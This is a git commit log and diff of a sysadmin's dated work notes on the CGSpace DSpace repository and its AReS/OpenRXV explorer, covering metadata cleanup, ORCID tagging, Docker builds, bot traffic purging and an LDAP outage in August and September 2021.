8fa41f92c8 Add notes for 2021-12-06 2021-12-06 16:40:50 +02:00
803d91481e Add notes for 2021-12 2021-12-05 17:55:47 +02:00
80c9765cc7 Add notes for 2021-12-02 2021-12-03 12:58:43 +02:00
0f2e08b43b Add notes 2021-11-30 16:44:30 +02:00
61a012edee Add notes for 2021-11-27 2021-11-27 14:37:33 +02:00
103b6548fa Add notes for 2021-11-26 2021-11-27 12:18:52 +02:00
55c22a0d10 Add notes for 2021-11-22 2021-11-22 16:47:50 +02:00
9f73f9bcb5 Add notes for 2021-11-21 and regenerate public 2021-11-21 13:45:30 +02:00
9afe5c13f9 Add notes for 2021-11-08 2021-11-09 06:29:52 +02:00
b3df4ff58f Add notes for 2021-11-07 2021-11-07 11:26:32 +02:00
2ca9096495 Add notes for 2021-11-02 2021-11-03 15:56:15 +02:00
b04ec94cbe Add 2021-11 and regenerate docs 2021-11-01 10:49:21 +02:00
be72befbe2 content/posts/2021-10.md: Fix toml syntax issue 2021-11-01 10:48:13 +02:00
dbff911e21 Add notes for 2021-10-31 2021-11-01 10:07:51 +02:00
5bec10a872 Regenerate docs 2021-11-01 10:07:11 +02:00
702efab048 Add notes for 2021-10-28 2021-10-28 18:08:13 +03:00
784984f4c0 Add notes for 2021-10-24 2021-10-24 21:21:01 +03:00
aa4835e32b Add notes for 2021-10-20 2021-10-20 22:21:55 +03:00
37e7b22fd3 Add notes for 2021-10-17 2021-10-17 20:47:01 +03:00
49d409f412 Add notes for 2021-10-11 2021-10-11 20:06:42 +03:00
4ad6f7e3a6 Add notes for 2021-10-10 2021-10-10 16:01:27 +03:00
ab8cb272ea Add notes for 2021-10-09 2021-10-09 22:00:59 +03:00
23d6a808fc Add notes for 2021-10-08 2021-10-08 17:15:17 +03:00
b55e6c9efe Add notes for 2021-10-06 2021-10-07 08:27:39 +03:00
63500a8837 Add notes for 2021-10-05 2021-10-05 18:54:39 +03:00
4c11bc1c1e Add notes for 2021-10 2021-10-04 19:40:13 +03:00
45ae9e7820 content/posts/2021-09.md: Fix syntax error 2021-10-04 11:10:54 +03:00
50407a4570 Add notes for 2021-09-29 2021-09-29 22:42:43 +03:00
a8adcff9e2 Add notes for 2021-09-28 2021-09-28 22:00:36 +03:00
a6add992ce Regenerate docs 2021-09-28 10:32:32 +03:00
f1d7a1186a Update theme submodule 2021-09-28 10:32:13 +03:00
7a891bd8ad Add notes for 2021-09-27 2021-09-27 17:15:57 +03:00
1bbd6355e5 Add notes for 2021-09-26 2021-09-26 22:16:39 +03:00
bbf478c410 Add notes for 2021-09-24 2021-09-24 14:24:00 +03:00
992c58601f Update notes for 2021-09-23 2021-09-23 18:32:47 +03:00
6fb37006b4 Add notes for 2021-09-23 2021-09-23 18:19:11 +03:00
f16d6c79a7 Regenerate public 2021-09-21 12:47:05 +03:00
43722deb40 cgspace-cgcorev2-migration.md: Add out of scope header 2021-09-21 12:46:34 +03:00
aad88f8084 Add notes for 2021-09-20 2021-09-20 17:31:45 +03:00
4b2b8c1034 content/posts/2020-01.md: Fix typo 2021-09-20 15:47:34 +03:00
313bed0608 Add notes for 2021-09-19 2021-09-19 15:42:23 +03:00
61e8011d7f Add notes for 2021-09-17 2021-09-17 15:03:28 +03:00
e067978bc0 Add notes for 2021-09-16 2021-09-16 16:35:00 +03:00
de66de9544 Add notes for 2021-09-16 2021-09-16 06:49:05 +03:00
c05c7213c2 Add notes for 2021-09-13 2021-09-13 16:21:16 +03:00
8b487a4a77 Add notes for 2021-09-05 2021-09-06 12:31:11 +03:00
71362684ea Add notes for 2021-09-02 2021-09-04 21:16:03 +03:00
2441d8ffd5 Add notes for 2021-09-02 2021-09-02 17:21:48 +03:00
8dc7ea732c content/posts/2021-08.md: Fix syntax error in vim modeline 2021-09-02 17:06:28 +03:00
fae039cf46 content/posts/2021-08.md: Syntax fix 2021-09-02 16:37:56 +03:00
c617679b73 Add notes for 2021-08-31 2021-09-01 09:12:28 +03:00
146c5b02ff Add notes for 2021-08-29 2021-08-29 21:07:25 +03:00
d5c9cc6059 Add notes for 2021-08-25 2021-08-25 15:13:43 +03:00
63d040ffef Update notes for 2021-08-19 2021-08-19 22:32:35 +03:00
65a2a89597 Add notes for 2021-08-18 2021-08-18 16:24:40 +03:00
38bbb29492 content/posts/2019-04.md: Fix typo 2021-08-18 15:29:31 +03:00
d71242aaec Add notes for 2021-08-17 2021-08-18 09:17:20 +03:00
14875c060f Add notes for 2021-08-17 2021-08-17 10:59:14 +03:00
aa7a0a8218 Add notes for 2021-08-16 2021-08-16 21:35:44 +03:00
38e9b3a7df Update notes for 2021-08-12 2021-08-12 21:12:25 +03:00
e35c79f0da Update notes for 2021-08-12 2021-08-12 16:36:55 +03:00
bf939afa24 Add notes for 2021-08-12 2021-08-12 12:42:59 +03:00
dba953ae9b Add notes for 2021-08-11 2021-08-11 16:19:26 +03:00
306 changed files with 51749 additions and 12959 deletions

View File

@ -777,7 +777,7 @@ Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
- Peter noticed that some goo.gl links in our tweets from Feedburner are broken, for example this one from last week:
{{< tweet 1086330519904673793 >}}
{{< tweet user="ILRI" id="1086330519904673793" >}}
- The shortened link is [goo.gl/fb/VRj9Gq](goo.gl/fb/VRj9Gq) and it shows a "Dynamic Link not found" error from Firebase:

View File

@ -623,7 +623,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
## 2019-04-14
- Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.14.4 startup script:
- Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:
```
GC_TUNE="-XX:NewRatio=3 \

View File

@ -209,7 +209,7 @@ dc.identifier.issn
- I need to follow up with Moayad about the reporting functionality
- Also, I need to email Harrison my notes on the CG Core v2 stuff
- Also, Jane asked me to check the Data Portal to see which email address requests for confidential data are going
- Yesterday Theirry from CTA asked me about an error he was getting while submitting an item on CGSpace: "Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission."
- Yesterday Thierry from CTA asked me about an error he was getting while submitting an item on CGSpace: "Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission."
- I looked in the DSpace logs and found this right around the time of the screenshot he sent me:
```

View File

@ -10,7 +10,7 @@ categories: ["Notes"]
- Open [a ticket](https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706) with Atmire to request a quote for the upgrade to DSpace 6
- Last week Altmetric responded about the [item](https://hdl.handle.net/10568/97087) that had a lower score than than its DOI
- The score is now linked to the DOI
- Another [item](https://handle.hdl.net/10568/91278) that had the same problem in 2019 has now also linked to the score for its DOI
- Another [item](https://hdl.handle.net/10568/91278) that had the same problem in 2019 has now also linked to the score for its DOI
- Another [item](https://hdl.handle.net/10568/81236) that had the same problem in 2019 has also been fixed
## 2020-01-07

View File

@ -21,7 +21,7 @@ categories: ["Notes"]
$ schedtool -D -e ionice -c2 -n7 nice -n19 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
```
- And it seems that we need to enabled `pg_crypto` now (used for UUIDs):
- And it seems that we need to enable `pgcrypto` now (used for UUIDs):
```
$ psql -h localhost -U postgres dspace63

View File

@ -210,6 +210,7 @@ if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].
- It is faster and uses less memory than GraphicsMagick (and ImageMagick), and produces nice thumbnails from PDFs
- One drawback is that libvips uses Poppler instead of Graphicsmagick, which apparently means that it can't work in CMYK
- I tested one item (10568/51999) that uses CMYK and the thumbnail looked OK (closer to the original than GraphicsMagick), so I'm not sure...
- Perhaps this is not a problem after all, see this PR from 2019: https://github.com/libvips/libvips/pull/1196
- I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:
```console
@ -225,5 +226,210 @@ $ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409
- The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
- libvips does use less time and memory... I should do more tests!
- I wonder if I can try to use these [unofficial Java bindings](https://github.com/criteo/JVips/blob/master/src/test/java/com/criteo/vips/example/SimpleExample.java) in DSpace
- The authors of the JVips project wrote a nice blog post about libvips performance: https://medium.com/criteo-engineering/boosting-image-processing-performance-from-imagemagick-to-libvips-268cc3451d55
- Ouch, JVips is Java 8 only as far as I can tell... that works now, but it's a non-starter going forward
## 2021-08-11
- Peter got back to me about the journal title cleanup
- From his corrections it seems an overwhelming majority of his choices match the Sherpa Romeo version of the titles rather than Crossref's
- Anyways, I exported the originals that were the same in Sherpa Romeo and Crossref as well as Peter's selections for where Sherpa Romeo and Crossref differred:
```console
$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
1911
```
- Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine
- I exported a list of all the journal titles we have in the `cg.journal` field:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
COPY 3245
```
- I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don't match, so I'd have to go check many of them manually before selecting a match or fixing them...
- I think it's better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way
- Or instead of doing it via SQL I could use CSV and parse the values there...
- A few more issues:
- Some ISSNs are non-existent in Sherpa Romeo and Crossref, but appear on issn.org's web search (their API is invite only)
- Some titles are different across all three datasets, for example ISSN 0003-1305:
- [According to ISSN.org](https://portal.issn.org/resource/ISSN/0003-1305) this is "The American statistician"
- [According to Sherpa Romeo](https://v2.sherpa.ac.uk/id/publication/20807) this is "American Statistician"
- [According to Crossref](https://search.crossref.org/?q=0003-1305&from_ui=yes&container-title=The+American+Statistician) this is "The American Statistician"
- I also realized that our previous controlled vocabulary came from CGSpace's top 500 journals, so when I replaced it with the generated list earlier today we lost some journals
- Now I went back and merged the previous with the new, and manually removed duplicates (sigh)
- I requested access to the issn.org OAI-PMH API so I can use their registry...
## 2021-08-12
- I sent an email to Sherpa Romeo's help contact to ask about missing ISSNs
- They pointed me to their [inclusion criteria](https://v2.sherpa.ac.uk/romeo/about.html) and said that missing journals should submit their open access policies to be included
- The contact from issn.org got back to me and said I should pay 1,000/year EUR for 100,000 requests to their API... no thanks
- Submit a pull request to COUNTER-Robots for the httpx bot ([#45](https://github.com/atmire/COUNTER-Robots/pull/45))
- In the mean time I added it to our local ILRI overrides
## 2021-08-15
- Start a fresh reindex on AReS
## 2021-08-16
- Meeting with Abenet and Peter about CGSpace actions and future
- We agreed to move three top-level Feed the Future projects into one community, so I created one and moved them:
```console
$ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
```
- I made a minor fix to OpenRXV to prefix all image names with `docker.io` so it works with less changes on podman
- Docker assumes the `docker.io` registry by default, but we should be explicit
## 2021-08-17
- I made an initial attempt on the policy statements page on DSpace Test
- It is modeled on Sherpa Romeo's OpenDOAR policy statements advice
- Sit with Moayad and discuss the future of AReS
- We specifically discussed formalizing the API and documenting its use to allow as an alternative to harvesting directly from CGSpace
- We also discussed allowing linking to search results to enable something like "Explore this collection" links on CGSpace collection pages
- Lower case all AGROVOC metadata, as I had noticed a few in sentence case:
```console
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 484
```
- Also update some DOIs using the `dx.doi.org` format, just to keep things uniform:
```console
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE 469
```
- Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 322m16.917s
user 226m43.121s
sys 3m17.469s
```
- I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:
```console
$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
-H 'Content-Type: application/json' \
-d '{
"size": 10,
"query": {
"bool": {
"filter": {
"term": {
"repo.keyword": "CGSpace"
}
}
}
}
}'
$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
```
- This uses the Elasticsearch scroll ID to page through results
- The second query doesn't need the request body because it is saved for 1 day as part of the first request
- Attempt to re-do my tests with VisualVM from 2019-04
- I found that I can't connect to the Tomcat JMX port using SSH forwarding (visualvm gives an error about localhost already being monitored)
- Instead, I had to create a SOCKS proxy with SSH (ssh -D 8096), then set that up as a proxy in the VisualVM network settings, and then add the JMX connection
- See: https://dzone.com/articles/visualvm-monitoring-remote-jvm
- I have to spend more time on this...
- I fixed a bug in the Altmetric donuts on OpenRXV
- We now [try to show the donut for the DOI first if it exists, then fall back to the Handle](https://github.com/ilri/OpenRXV/pull/113)
- This is working on my local test, but not on the live site... sigh
- I started a fresh harvest, maybe it's something to do with the metadata in Elasticsearch
- I improved the quality of the "no thumbnail" placeholder image on AReS: https://github.com/ilri/OpenRXV/pull/114
- I sent some feedback to some ILRI and CCAFS colleagues about how to use better thumbnails for publications
## 2021-08-24
- In the last few days I did a lot of work on OpenRXV
- I started exploring the Angular 9.0 to 9.1 update
- I tested some updates to dependencies for Angular 9 that we somehow missed, like @tinymce/tinymce-angular, @nicky-lenaers/ngx-scroll-to, and @ng-select/ng-select
- I changed the default target from ES5 to ES2015 because ES5 was released in 2009 and the only thing we lose by moving to ES2015 is IE11 support
- I fixed a handful of issues in the Docker build and deployment process
- I started exploring changing the Docker configuration from using volumes to `COPY` instructions in the `Dockerfile` because we are having sporadic issues with permissions in containers caused by copying the host's frontend/backend directories and not being able to write to them
- I tested moving from node-sass to sass, as it has been [supported since Angular 8 apparently](https://blog.ninja-squad.com/2019/05/29/angular-cli-8.0/) and will allow us to avoid stupid node-gyp issues
## 2021-08-25
- I did a bunch of tests of the OpenRXV Angular 9.1 update and merged it to master ([#115](https://github.com/ilri/OpenRXV/pull/115))
- Last week Maria Garruccio sent me a handful of new ORCID identifiers for Bioversity staff
- We currently have 1320 unique identifiers, so this adds eleven new ones:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
$ wc -l /tmp/2021-08-25-combined-orcids.txt
1331
```
- After I combined them and removed duplicates, I resolved all the names using my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
```
- Tag existing items from the Alliance's new authors with ORCID iDs using `add-orcid-identifiers-csv.py` (181 new metadata fields added):
```console
$ cat 2021-08-25-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
"Jager M.","Matthias Jager: 0000-0003-1059-3949"
"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
## 2021-08-29
- Run a full harvest on AReS
- Also do more work the past few days on OpenRXV
- I switched the backend target from ES2017 to ES2019
- I did a proof of concept with multi-stage builds and simplifying the Docker configuration
- Update the list of ORCID identifiers on CGSpace
- Run system updates and reboot CGSpace (linode18)
## 2021-08-31
- Yesterday I finished the work to make OpenRXV use a new multi-stage Docker build system and use smarter `COPY` instructions instead of runtime volumes
- Today I merged the changes to the master branch and re-deployed AReS on linode20
- Because the `docker-compose.yml` moved to the root the Docker volume prefix changed from `docker_` to `openrxv_` so I had to stop the containers and rsync the data from the old volume to the new one in /var/lib/docker
<!-- vim: set sw=2 ts=2: -->

395
content/posts/2021-09.md Normal file
View File

@ -0,0 +1,395 @@
---
title: "September, 2021"
date: 2021-09-01T09:14:07+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-09-02
- Troubleshooting the missing Altmetric scores on AReS
- Turns out that I didn't actually fix them last month because the check for `content.altmetric` still exists, and I can't access the DOIs using `_h.source.DOI` for some reason
- I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
- I will change `DOI` to `tomato` in the repository setup and start a re-harvest... I need to see if this is some kind of reserved word or something...
- Even as `tomato` I can't access that field as `_h.source.tomato` in Angular, but it does work as a filter source... sigh
- I'm having problems using the OpenRXV API
- The syntax Moayad showed me last month doesn't seem to honor the search query properly...
<!--more-->
## 2021-09-05
- Update Docker images on AReS server (linode20) and rebuild OpenRXV:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then run system updates and reboot the server
- After the system came back up I started a fresh re-harvesting
## 2021-09-07
- Checking last month's Solr statistics to see if there are any new bots that I need to purge and add to the list
- 78.203.225.68 made 50,000 requests on one day in August, and it is using this user agent: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36`
- It's a fixed line ISP in Montpellier according to AbuseIPDB.com, and has not been flagged as abusive, so it must be some CGIAR SMO person doing some web application harvesting from the browser
- 130.255.162.154 is in Sweden and made 46,000 requests in August and it is using this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0`
- 35.174.144.154 is on Amazon and made 28,000 requests with this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36`
- 192.121.135.6 is in Sweden and made 9,000 requests with this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0`
- 185.38.40.66 is in Germany and made 6,000 requests with this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 BoldBrains SC/1.10.2.4`
- 3.225.28.105 is in Amazon and made 3,000 requests with this user agent: `Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
- I also noticed that we still have tons (25,000) of requests by MSNbot using this normal-looking user agent: `Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko`
- I can identify them by their reverse DNS: msnbot-40-77-167-105.search.msn.com.
- I had already purged a bunch of these by their IPs in 2021-06, so it looks like I have to do that again
- While looking at the MSN requests I noticed tons of requests from another strange host using reverse IP DNS: malta2095.startdedicated.com., astra5139.startdedicated.com., and many others
- They must be related, because I see them all using the exact same user agent: `Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko`
- So this startdedicated.com DNS is some Bing bot also...
- I extracted all the IPs and purged them using my `check-spider-ip-hits.sh` script
- In total I purged 225,000 hits...
## 2021-09-12
- Start a harvest on AReS
## 2021-09-13
- Mishell Portilla asked me about thumbnails on CGSpace being small
- For example, [10568/114576](https://cgspace.cgiar.org/handle/10568/114576) has a lot of white space on the left side
- I created a new thumbnail with vipsthumbnail:
```console
$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
```
- Looking at the PDF's metadata I see:
- Producer: iLovePDF
- Creator: Adobe InDesign 15.0 (Windows)
- Format: PDF-1.7
- Eventually I should do more tests on this and perhaps file a bug with DSpace...
- Some Alliance people contacted me about getting access to the CGSpace API to deposit with their TIP tool
- I told them I can give them access to DSpace Test and that we should have a meeting soon
- We need to figure out what controlled vocabularies they should use
## 2021-09-14
- Some people from the Alliance contacted me last week about AICCRA metadata
- They have internal things called Components and Clusters, so they were asking how to store these in CGSpace
- I suggested adding new metadata values: `cg.subject.aiccraComponent` and `cg.subject.aiccraCluster`
- On second thought, these are identifiers so perhaps this is better: `cg.identifier.aiccraComponent` and `cg.identifier.aiccraCluster`
## 2021-09-15
- Add ORCID identifier for new ILRI staff to our controlled vocabualary
- Also tag their twenty-five existing items on CGSpace:
```console
$ cat 2021-09-15-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
```
- Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
- I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using
- I also told them that I would create some documentation listing the metadata fields, which are mandatory, and the respective controlled vocabularies
## 2021-09-16
- Start writing a Python script to parse `input-forms.xml` to create documentation for submissions
- Found a bug with the DSpace 6.3 REST API, it returns HTTP 500 for `dc.title` even though it exists in the registry: https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/title
- Seems to be with any field that does not have a qualifier
- I filed an issue: https://github.com/DSpace/DSpace/issues/7946
- I decided to update all the metadata field descriptions in our registry so I can use that instead of the "hint" for each field in the input form
- I will include examples as well so that it becomes a better resource
## 2021-09-17
- I filed [an issue about using SPDX License Identifiers in CG Core v2](https://github.com/AgriculturalSemantics/cg-core/issues/41)
- Peter Ballantyne emailed me to say that CGSpace was very slow
- The front page was returning a blank white page
- I looked at the database and the connections look low:
```console
$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
63
```
- Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin
- But the DSpace log file shows tons of database issues:
```console
$ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17
14779
```
- The earliest one I see is around midnight (now is 2PM):
```console
2021-09-17 00:01:49,572 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
```
- But I was definitely logged into the site this morning so there were no issues then...
- It seems that a few errors are normal, but there's obviously something wrong today:
```console
$ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
dspace.log.2021-09-01:116
dspace.log.2021-09-02:163
dspace.log.2021-09-03:77
dspace.log.2021-09-04:13
dspace.log.2021-09-05:310
dspace.log.2021-09-06:0
dspace.log.2021-09-07:29
dspace.log.2021-09-08:86
dspace.log.2021-09-09:24
dspace.log.2021-09-10:26
dspace.log.2021-09-11:12
dspace.log.2021-09-12:5
dspace.log.2021-09-13:10
dspace.log.2021-09-14:102
dspace.log.2021-09-15:542
dspace.log.2021-09-16:368
dspace.log.2021-09-17:15235
```
- I restarted the server and DSpace came up fine... so it must have been some kind of fluke
- Continue working on cleaning up and annotating the metadata registry on CGSpace
- I removed two old metadata fields that we stopped using earlier this year with the CG Core v2 migration: `cg.targetaudience` and `cg.title.journal`
## 2021-09-18
- Make more progress on parsing and documenting the CGSpace submission form
- Publish on GitHub: https://github.com/ilri/cgspace-submission-guidelines
## 2021-09-19
- Improve CGSpace Submission Guidelines metadata parsing and documentation
- GitHub Pages is live now: https://ilri.github.io/cgspace-submission-guidelines/
- Start a full harvest on AReS
- The harvest completed successfully, but for some reason there were only 92,000 items...
- I updated all Docker images, rebuilt the application, then ran all system updates and rebooted the system:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
## 2021-09-20
- I synchronized the production CGSpace PostreSQL, Solr, and Assetstore data with DSpace Test
- Over the weekend a few users reported that they could not log into CGSpace
- I checked LDAP and it seems there is something wrong:
```console
$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
Enter LDAP Password:
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
```
- I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
- It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decomissioned the old one last week
- I updated the configuration on CGSpace and confirmed that it is working
- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
```console
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
```
- I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
- Run `dspace cleanup -v` process on CGSpace to clean up old bitstreams
- Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
COPY 80901
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
COPY 1274
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
COPY 8091
```
## 2021-09-23
- Peter sent me back the corrections for the affiliations
- It is about 1,280 corrections and fourteen deletions
- I cleaned them up in csv-metadata-quality and then extracted the deletes and fixes to separate files to run with `fix-metadata-values.py` and `delete-metadata-values.py`:
```console
$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
```
- Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
```
- Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too
- Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne
- Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:
